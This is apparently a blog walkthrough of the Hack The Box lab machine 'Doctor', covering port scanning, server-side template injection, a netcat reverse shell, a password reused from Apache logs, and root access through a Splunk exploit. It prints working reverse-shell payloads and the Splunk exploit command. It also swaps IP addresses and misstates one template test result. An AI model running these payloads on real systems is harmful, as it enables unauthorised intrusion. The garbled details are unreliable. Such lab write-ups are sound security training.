Doctor : Hack The Box Walk Through
Doctor is one of the easy boxes on HTB. FYI Easy boxes are also tougher than the boxes on any other platform.
Add the IP address(10.10.10.209) with doctors.htb to the hosts file (/etc/hosts) and we are good to go!!!
Concept Learnt:
- Enumeration
- SSTI i.e Server Side Template Injection
- Reverse shell
- Privilege Escalation using Splunk
Port Scanning
Scanning with the nmap to find the open ports and the services
Command used: nmap -A -T4 doctors.htb
We can observe that Splunk , HTTP and SSH ports are open. Starting with web recon
So we can observe that there is a login page in the application or we could use dirbuster/dirb or gobuster to enumerate all the pages in the web app
So we have the login portal now , tried SQLi but no luck.
So we have no option left than signing up in the portal.
Now while enumerating I observed that whatever the message in Title field will be , reflected in URI /archive (page source )found in the directory scan.
Since it is reflecting the values we could try various attacks like XSS, SSTI etc
No luck with the XSS , trying with the SSTI.
We have various methods to find that the field is vulnerable to SSTI or not. Personally I follow this image to find the specific template used in application as well is it vulnerable to it or not??
Enter in the title field {7*7} → {{7*7}} → {{7*’7'}} → Result 55555. This shows that the template used in the application is Jinja2 or Twig
For detailed info on SSTI (Server Side Template Injection) visit:
Gaining reverse shell:
Now as we have enough information about the template. We could use that info for creating reverse payload. There are plethora of payloads available on the internet for reverse shell. The easiest payload which I encountered is
<img src=http://10.10.14.33/$(nc.traditional$IFS-e$IFS/bin/bash$IFS'10.10.14.33'$IFS'1234')>
Here we are calling netcat & $IFS in the code means whitespace. Thus our simplified code (for understanding purpose) is:
<img src=http://IPaddressofmachine/$(nc -e /bin/bash ‘10.10.14.33’ ‘1234’)
Or we could use the payload mentioned here!!
Make sure there is listener already being active before executing this command. Here in the case nc -nlvp 1234. Since we have used port 1234 in malicious code.
Boom we got the reverse shell!!!
We got the www (web) account of the machine. Getting interactive shell using python module (pty):
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
Now by exploring the system we could know the user account present is shaun. Enumerating groups of the accounts to find more info
We could find web adm group which is used for viewing log files i.e /var/log
Now looking for logs of apache2 in the system and hope to find something useful!
Boom …we found a backup file..Digging into the backup file and we could find the password i.e Guitar123 (by grep keyword “password” in the file)
Privilege Escalation
Logging using useraccount and password i.e su shaun and password Guitar123.
Here we could finish our first checkpoint i.e user flag in home folder.
Yet this account also does not have sudo rights (sudo -l). Thus finding binary vulnerability using linpeas. No luck
Now, googling about the exploitation of SPLUNK HTTPD (Privilege Escalation) and found a exploit:
Exploiting the Splunk using parameters required as mentioned in the readme file of Splunk
python3 PySplunkWhisperer2_remote.py — host 10.10.10.209 — lhost 10.10.14.33 — username shaun — password Guitar123 — payload ‘nc.traditional -e/bin/sh ‘10.10.14.33’ ‘1233’’
Here 10.10.14.33 is the host IP(Doctor’s) address and 10.10.14.33 is our IP address. Thus using netcat trying to get reverse shell
Make sure the netcat listener is active on the port which we have mentioned in the parameter of SPLUNK, here in our case “1233"
Boom we got the root access!!!
Since we have got root access , we could have interactive shell using python module and complete our final checkpoint i.e root flag
For more walkthroughs stay tuned!!! Any doubts lemme know in the comment section. See you soon!!
